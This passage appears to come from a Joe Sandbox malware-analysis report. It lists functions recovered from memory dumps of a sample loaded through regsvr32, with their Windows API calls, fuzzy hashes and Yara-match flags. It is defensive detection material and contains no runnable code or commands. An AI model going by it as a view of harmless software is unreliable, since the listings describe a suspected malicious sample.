DecodePointer.KERNEL32 ref: 02E5591D
EncodePointer.KERNEL32 ref: 02E5599B

Part of subcall function 02E5A8E4: realloc.LIBCMT ref: 02E5A90F
Part of subcall function 02E5A8E4: Sleep.KERNEL32 ref: 02E5A92B

EncodePointer.KERNEL32 ref: 02E559AB
EncodePointer.KERNEL32 ref: 02E559B8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleeprealloc
String ID:
API String ID: 1601076685-0
Opcode ID: 41bb2ee92579e29bb048e88261e2f5d15513c2e40ba12b19a60fef79da225d25
Instruction ID: e1f273d22e4ac87ff88bc01c094de89fc9b98d9883764b3f5692763e4126716f
Opcode Fuzzy Hash: 41bb2ee92579e29bb048e88261e2f5d15513c2e40ba12b19a60fef79da225d25
Instruction Fuzzy Hash: BF2195213A2BA481DA109F52F94C359B361F749BE4F84A835DE6E47B18EF7CC485C701

Function 02E4CF50 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 02E4CF98
SelectObject.GDI32 ref: 02E4CFA9
SetDIBColorTable.GDI32 ref: 02E4CFBF
SelectObject.GDI32 ref: 02E4CFD2
DeleteDC.GDI32 ref: 02E4CFF4

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ObjectSelect$ColorCompatibleCreateDeleteTable
String ID:
API String ID: 3899591553-0
Opcode ID: 25bca2b50bd8d51f8858a6c8eb88d856bb50887b8d04bad872bb72e688f53c5b
Instruction ID: 2a454ba23f65de6ed094ad9cea80d8a5e9421a2b958779ec357f5b025398844d
Opcode Fuzzy Hash: 25bca2b50bd8d51f8858a6c8eb88d856bb50887b8d04bad872bb72e688f53c5b
Instruction Fuzzy Hash: 6B118936245A4089EB548F26F49871933A5FBA8BD8F24B126DE4B53B18CF39C485C380

Function 02E4A740 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 02E4A762
malloc.LIBCMT ref: 02E4A770

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

GetCurrentProcessId.KERNEL32 ref: 02E4A7A7
free.LIBCMT ref: 02E4A7C3
CloseHandle.KERNEL32 ref: 02E4A7CB

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process_errno$AllocCloseCurrentHandleHeapOpen_callnewhfreemalloc
String ID:
API String ID: 1715275611-0
Opcode ID: 6199685c681e89abc964dfd2cc35e6f96c4d0bea44aa1d2d8b5656ebf405cfb4
Instruction ID: e0d1f4d5e534724a695745063b0e30379f421894c855fa810b3425addcea485f
Opcode Fuzzy Hash: 6199685c681e89abc964dfd2cc35e6f96c4d0bea44aa1d2d8b5656ebf405cfb4
Instruction Fuzzy Hash: 12119D32794A8086EB209B56F42875DB771F788BD8F889125DB9E03B49CF38C4818B40

Function 02E45DC0 Relevance: 7.5, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 02E45DE5
EnterCriticalSection.KERNEL32 ref: 02E45DEF
LeaveCriticalSection.KERNEL32 ref: 02E45DFF
LeaveCriticalSection.KERNEL32 ref: 02E45E09

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 44c292e90eb37e2d7492bf557040c1a2ec22a7d7a39af7b405922077d069d486
Instruction ID: c1e13cb1e95f34847b2fb4ffc248c94145eede8a503aa639f215c52710835f21
Opcode Fuzzy Hash: 44c292e90eb37e2d7492bf557040c1a2ec22a7d7a39af7b405922077d069d486
Instruction Fuzzy Hash: 0C11EC36664A8083EB649B62F8983AA7360F758795F846021DB9B47E64DF3CD5CAC700

Function 028800DC Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 028800E5
_errno.LIBCMT ref: 028800ED

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 7dc4d60269de1f28ce6bcda9ddb35f367140244f83087da5b98b7f79842c89cf
Instruction ID: 0c1874710eab3c5ea317fc7c931c2002559cfcd3042e033fd09506f7ac782927
Opcode Fuzzy Hash: 7dc4d60269de1f28ce6bcda9ddb35f367140244f83087da5b98b7f79842c89cf
Instruction Fuzzy Hash: 1CF0623C5649498EE719FB68C8947B832A1FF4533AF894298D01ACB1F5E77C9444CA63

Function 028C07E9 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 028C07F2
_errno.LIBCMT ref: 028C07FA

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 3f8399101a99e04f111acb68838fd8e0fe981b5cff2cdfebbd5aafd65add2f64
Instruction ID: ce07f52b1fb5c7f5cc29d7f9fa4ea3db50348c67aebcd438850dc2a7b1dbf68b
Opcode Fuzzy Hash: 3f8399101a99e04f111acb68838fd8e0fe981b5cff2cdfebbd5aafd65add2f64
Instruction Fuzzy Hash: 4BF0C23C168949CED70AAB6CCC507A43691FF46329FA4D34CE506C72E2C7788440CB52

Function 02E62514 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 02E6254B
GetCurrentProcessId.KERNEL32 ref: 02E62556
GetCurrentThreadId.KERNEL32 ref: 02E62562
GetTickCount.KERNEL32 ref: 02E6256E
QueryPerformanceCounter.KERNEL32 ref: 02E6257F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 97ad835b81cb6df91117922e019d69de1d0eaff2d601c02b2c415f9bb153aa1b
Instruction ID: 1f9378ddff1f1da1b6f91193d5020447d3c247592fa62ccb2917e4cfb4cc9eb0
Opcode Fuzzy Hash: 97ad835b81cb6df91117922e019d69de1d0eaff2d601c02b2c415f9bb153aa1b
Instruction Fuzzy Hash: 2A01B1212A9B8082EB50CF21F85D3557364F759BD6F547621EE6F47BA0DB3CC8858700

Function 02E4C630 Relevance: 7.5, APIs: 5, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 02E4C66A
EnterCriticalSection.KERNEL32 ref: 02E4C677
EnterCriticalSection.KERNEL32 ref: 02E4C68C
GdiplusShutdown.GDIPLUS ref: 02E4C69E
LeaveCriticalSection.KERNEL32 ref: 02E4C6B2

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$DeleteGdiplusLeaveObjectShutdown
String ID:
API String ID: 1513102227-0
Opcode ID: d4542beb37d90f8ad3c0edd15d75e9a44333cb729b96ee7ae577a21e01d114c8
Instruction ID: a1a952211d6f4d94c13d05f2ec5c481317ab6966918653c55322b3df8a5c3acf
Opcode Fuzzy Hash: d4542beb37d90f8ad3c0edd15d75e9a44333cb729b96ee7ae577a21e01d114c8
Instruction Fuzzy Hash: D911D771282B86C1EB149F65F89C3543374FB28F68F646225C5AE43AB0DF39C19AC350

Function 02E6809C Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E680A5
_errno.LIBCMT ref: 02E680AD

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: b090733ce00a7d6ef75ad3e43b7a98ae415e30c3fad73d63844ff4cd7894af6a
Instruction ID: 4f007ba4f1268eb7751f4d0960d4620510a1a08552b55cc972b03f33fed9dd99
Opcode Fuzzy Hash: b090733ce00a7d6ef75ad3e43b7a98ae415e30c3fad73d63844ff4cd7894af6a
Instruction Fuzzy Hash: 2FF0F6B22E169484DE05AB14C89C33C76A29B90BB6F92E742DA3D0B3D0CBBC4445CA21

Function 02882B0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

APIs

_fltout2.LIBCMT ref: 02882B47
_errno.LIBCMT ref: 02882B51
_invalid_parameter_noinfo.LIBCMT ref: 02882B58

Strings

-, xrefs: 02882B73

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno_fltout2_invalid_parameter_noinfo
String ID: -
API String ID: 485257318-2547889144
Opcode ID: b2371414ba15bd96bd34930c290af5108b2ff8fdf43211108ea949018dfebcf9
Instruction ID: 00ff2a2de93f676166d9abb9f522d9bd6c621c0343706e304c1289c7c39bfa03
Opcode Fuzzy Hash: b2371414ba15bd96bd34930c290af5108b2ff8fdf43211108ea949018dfebcf9
Instruction Fuzzy Hash: F331D539218A888FDB55FB3C988177A73E1FB99354F044A2EEC8EC3244DE21D8458793

Function 028C3219 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

APIs

_fltout2.LIBCMT ref: 028C3254
_errno.LIBCMT ref: 028C325E
_invalid_parameter_noinfo.LIBCMT ref: 028C3265

Strings

-, xrefs: 028C3280

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno_fltout2_invalid_parameter_noinfo
String ID: -
API String ID: 485257318-2547889144
Opcode ID: 230054471ab9e94bf14a18ec9c1b65bcb69ff4194e86f8a2025a727ab66c8c29
Instruction ID: 01e11bf09137d89dc14007524c4dd648efae7662c1bcc2ba6ce91ceae58098fe
Opcode Fuzzy Hash: 230054471ab9e94bf14a18ec9c1b65bcb69ff4194e86f8a2025a727ab66c8c29
Instruction Fuzzy Hash: C231E739218A884FCB55EB7C98817AA77E1FBC5315F24465EE88EC3240DF35D8468B93

Function 02E44640 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115networkCOMMON

Download Yara Rule

APIs

WSAEnumNetworkEvents.WS2_32 ref: 02E44678
WSAGetLastError.WS2_32 ref: 02E44686
WSAResetEvent.WS2_32 ref: 02E446C3

Strings

, xrefs: 02E4478C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: EnumErrorEventEventsLastNetworkReset
String ID:
API String ID: 1050048411-3916222277
Opcode ID: de254dcb7ccf77805dc610188d48849fc80be153bc30c80741740ae0a985eb5d
Instruction ID: 32c505d42f4011af555433018e02ea71c5e5979b060330cd93efac763eca34f0
Opcode Fuzzy Hash: de254dcb7ccf77805dc610188d48849fc80be153bc30c80741740ae0a985eb5d
Instruction Fuzzy Hash: 3E418A722447808BE720CF29E40875A77E2F785B8CF159119DE4987798EFBAC946CF40

Function 028835C9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 028835D1
_getptd.LIBCMT ref: 02883693
_getptd.LIBCMT ref: 0288369F

Strings

csm, xrefs: 02883653

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm
API String ID: 3186804695-1018135373
Opcode ID: 916a707afdb0f71ebe95bef2f33ca7e6fa47fc2edc3f926a604d61cd2de3a953
Instruction ID: 13bd1391c9a5a524b125977be079dbbde78058738bd6adc5f43ce153e29d7e37
Opcode Fuzzy Hash: 916a707afdb0f71ebe95bef2f33ca7e6fa47fc2edc3f926a604d61cd2de3a953
Instruction Fuzzy Hash: D4315A79208B048FDB64EF1CD484B69B3E1FB98715F5006ACD48EC7642DB31E842CB86

Function 028823C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

_fltout2.LIBCMT ref: 028823FD
_errno.LIBCMT ref: 02882407
_invalid_parameter_noinfo.LIBCMT ref: 0288240E

Strings

-, xrefs: 02882444

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno_fltout2_invalid_parameter_noinfo
String ID: -
API String ID: 485257318-2547889144
Opcode ID: 363d0df97914af9f27d5d13ea758efb9d61f29a21fe89b0b544be230302bbbe4
Instruction ID: 4c4967050423927c79642f350058cf1a7ccc72920c34c4a1ca8f4109922af104
Opcode Fuzzy Hash: 363d0df97914af9f27d5d13ea758efb9d61f29a21fe89b0b544be230302bbbe4
Instruction Fuzzy Hash: 6D21C239218E8C4BCB54FB6CD88576AB3E5FB94310F54462EA89AC3284DF24D8458B93

Function 028C2AD1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

_fltout2.LIBCMT ref: 028C2B0A
_errno.LIBCMT ref: 028C2B14
_invalid_parameter_noinfo.LIBCMT ref: 028C2B1B

Strings

-, xrefs: 028C2B51

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno_fltout2_invalid_parameter_noinfo
String ID: -
API String ID: 485257318-2547889144
Opcode ID: bbdcb5bc06b9c46dfb1d423dceb7eebd86a9672f6a5897a7d82af974e746431d
Instruction ID: 408f183092c54ee4d5eff8447ece82d624da80e21f801e7cc1256ff570043dc6
Opcode Fuzzy Hash: bbdcb5bc06b9c46dfb1d423dceb7eebd86a9672f6a5897a7d82af974e746431d
Instruction Fuzzy Hash: 8B21C239218E4D8BC765FB7C988476BB3E5FB84310F14452EA88AC3284DF35D8458B92

Function 02E6A2F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

_fltout2.LIBCMT ref: 02E6A32B
_errno.LIBCMT ref: 02E6A335
_invalid_parameter_noinfo.LIBCMT ref: 02E6A33C

Strings

-, xrefs: 02E6A357

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_fltout2_invalid_parameter_noinfo
String ID: -
API String ID: 485257318-2547889144
Opcode ID: 02bff1a59af1fa515b6cbdd793a19a9d5db4cd0daae80a934fe287ecd89124cf
Instruction ID: 1a45ad46501b1c8828227f45928ded0243cdb7f839c391e6a96dd921769c779c
Opcode Fuzzy Hash: 02bff1a59af1fa515b6cbdd793a19a9d5db4cd0daae80a934fe287ecd89124cf
Instruction Fuzzy Hash: 2E3109227D46C085DB219F25A84876EB761E785BE8F14E236EF8917B94DF3DC445CB00

Function 02E6A708 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E6A721
_invalid_parameter_noinfo.LIBCMT ref: 02E6A72D
_errno.LIBCMT ref: 02E6A754

Strings

1, xrefs: 02E6A7A3

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID: 1
API String ID: 2819658684-2212294583
Opcode ID: 6b53c2dcc294edf9728eab1c0bef983e4baecdb5bea7ed18be76febd96b6e3f9
Instruction ID: 02da83e0b901933ec00727ee79746b7f270671204d84f54111e59419d5b5e4c6
Opcode Fuzzy Hash: 6b53c2dcc294edf9728eab1c0bef983e4baecdb5bea7ed18be76febd96b6e3f9
Instruction Fuzzy Hash: DD113A62AE92D095DB178F38943837C6A75DB55BC8F89F071DB4617312D72DE940CB10

Function 02E55378 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 02E55386
malloc.LIBCMT ref: 02E55392

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

std::exception::exception.LIBCMT ref: 02E553FF

Strings

bad allocation, xrefs: 02E553CF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _callnewh_errno$AllocHeapmallocstd::exception::exception
String ID: bad allocation
API String ID: 2837191506-2104205924
Opcode ID: 2789b863962101d94b643c399cf47e2269a7bf3f296a5f660e329cf77ed2a842
Instruction ID: 68b107d4d22db69345e012385652d30cc771557447f83c1bc52e3f2edd7b9b92
Opcode Fuzzy Hash: 2789b863962101d94b643c399cf47e2269a7bf3f296a5f660e329cf77ed2a842
Instruction Fuzzy Hash: B2018F612E5B9691EF10EF20F8583992365FB54384FC8A421AD8E477A4EF7CC144CB10

Function 02E5BB0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 02E5BB1B
GetProcAddress.KERNEL32 ref: 02E5BB30

Strings

mscoree.dll, xrefs: 02E5BB14
CorExitProcess, xrefs: 02E5BB26

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 825098e7262f08d60cb7bdb3c3f67da28a0895d5aeadfa1fb81c8a544a304b7a
Instruction ID: 3bd79f743347d4242883c5f6949efb675c4a6be8b6875e71e0b19b09d91101ea
Opcode Fuzzy Hash: 825098e7262f08d60cb7bdb3c3f67da28a0895d5aeadfa1fb81c8a544a304b7a
Instruction Fuzzy Hash: 1FD01710796A8182EE599BA0F8AC32823505B98798F48202D882E06355EF6886898310

Function 02E5ACA4 Relevance: 6.4, APIs: 5, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 02E5A7E0: malloc.LIBCMT ref: 02E5A80B
Part of subcall function 02E5A7E0: Sleep.KERNEL32 ref: 02E5A81E

free.LIBCMT ref: 02E5ADD0
free.LIBCMT ref: 02E5ADEC

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$Sleepmalloc
String ID:
API String ID: 1995388493-0
Opcode ID: 937ab413b08246a84f5eda74101b413cfd46f5463a50d76eaf4660d41468c8d6
Instruction ID: 1819eaeb5d9700216068d531778bfa695914abbcccb06066ab5ee1bbea680b1a
Opcode Fuzzy Hash: 937ab413b08246a84f5eda74101b413cfd46f5463a50d76eaf4660d41468c8d6
Instruction Fuzzy Hash: 9F419832391B9497DB14DF66E99039A33A4F784B98F849239EF8D47B10DF38D5628740

Function 02E514A0 Relevance: 6.3, APIs: 5, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02E514E5
free.LIBCMT ref: 02E51525
free.LIBCMT ref: 02E51578
GetProcessHeap.KERNEL32 ref: 02E51585
HeapFree.KERNEL32 ref: 02E51593

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$Heap$FreeProcess
String ID:
API String ID: 3493288988-0
Opcode ID: 6c013b565ca14f6815c43c194a3a20116d2b7f974b210a047db512b5b65b0d71
Instruction ID: 201ab49026254919aa0c781c4a312c317d7e207a3df9e3c061118a162f33fd83
Opcode Fuzzy Hash: 6c013b565ca14f6815c43c194a3a20116d2b7f974b210a047db512b5b65b0d71
Instruction Fuzzy Hash: 3A314726761A6097DB28DBA6E14075D6370FB88F88F48A025DF4E07F14CF34D4A18740

Function 0287CD33 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0287CD67
_invalid_parameter_noinfo.LIBCMT ref: 0287CD72
iswctype.LIBCMT ref: 0287CDAB
_errno.LIBCMT ref: 0287CED5

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfoiswctype
String ID:
API String ID: 248606491-0
Opcode ID: aeb513ee65751ef69d87611bd964b8af52c6f8f90d4da357b889b4f01a58cbea
Instruction ID: 5db8c28a943d0df2a48815a4ede419405ea146dbe104314113d3924ba844d9cb
Opcode Fuzzy Hash: aeb513ee65751ef69d87611bd964b8af52c6f8f90d4da357b889b4f01a58cbea
Instruction Fuzzy Hash: D5516D7F808A1949EB381A2DD88637A39C5FB42764F24121BDDEED7181F760D4838397

Function 02E56CD8 Relevance: 6.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E56D07
_invalid_parameter_noinfo.LIBCMT ref: 02E56D12
iswctype.LIBCMT ref: 02E56D4B
_errno.LIBCMT ref: 02E56E75

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfoiswctype
String ID:
API String ID: 248606491-0
Opcode ID: 600b5e1a0884fd86083a6c40ec30f50f7914204e96c09ac3a2eb1a49d6991a14
Instruction ID: 803c848d66862f1722107597a355eda0124efbc46094cf0474fb3a9c6acb2a24
Opcode Fuzzy Hash: 600b5e1a0884fd86083a6c40ec30f50f7914204e96c09ac3a2eb1a49d6991a14
Instruction Fuzzy Hash: 48414463AF117044EF346A2BD80437B219EBB42BACFD5F922DE5247190EB79C581C312

Function 02E5C404 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E5C452
_invalid_parameter_noinfo.LIBCMT ref: 02E5C45D
DecodePointer.KERNEL32 ref: 02E5C50C
_lock.LIBCMT ref: 02E5C537

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 27599310-0
Opcode ID: 7363268150c92f0dc87d915cd02ac402206b057223f311218893b197a08f2757
Instruction ID: 4905ad6cc7b09aea7ff82262fa381cb90529dc0e0495ec8c2779ed699b7b0e3d
Opcode Fuzzy Hash: 7363268150c92f0dc87d915cd02ac402206b057223f311218893b197a08f2757
Instruction Fuzzy Hash: F051CF322A47A086DA29CF65E8A437A6762F78579CF74F11BDE9E43714CF38C042C601

Function 028831FC Relevance: 6.2, APIs: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02881A74: _getptd.LIBCMT ref: 02881A78

_getptd.LIBCMT ref: 0288323B
_SetImageBase.LIBCMT ref: 0288330E
_getptd.LIBCMT ref: 0288333C
_getptd.LIBCMT ref: 0288334A

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd$BaseImage
String ID:
API String ID: 2482573191-0
Opcode ID: 9c5b89509d60e0603f5a734c5cd4ba2a093cff095a5bf51701f84cb58c52bfef
Instruction ID: b5f9985361718bbeb5a1d28a96e4e74d4d961c0213631a8f0f17f18f069e4015
Opcode Fuzzy Hash: 9c5b89509d60e0603f5a734c5cd4ba2a093cff095a5bf51701f84cb58c52bfef
Instruction Fuzzy Hash: 6341F73D118A058ED314776CD4092B972D2FB85B29F2846EED48AC35A1EF74E9438B93

Function 0287AA68 Relevance: 6.2, APIs: 4, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0287ECC8: _errno.LIBCMT ref: 0287ECD1
Part of subcall function 0287ECC8: _invalid_parameter_noinfo.LIBCMT ref: 0287ECDC

_errno.LIBCMT ref: 0287AA95
_errno.LIBCMT ref: 0287AAB1
_isatty.LIBCMT ref: 0287AB12
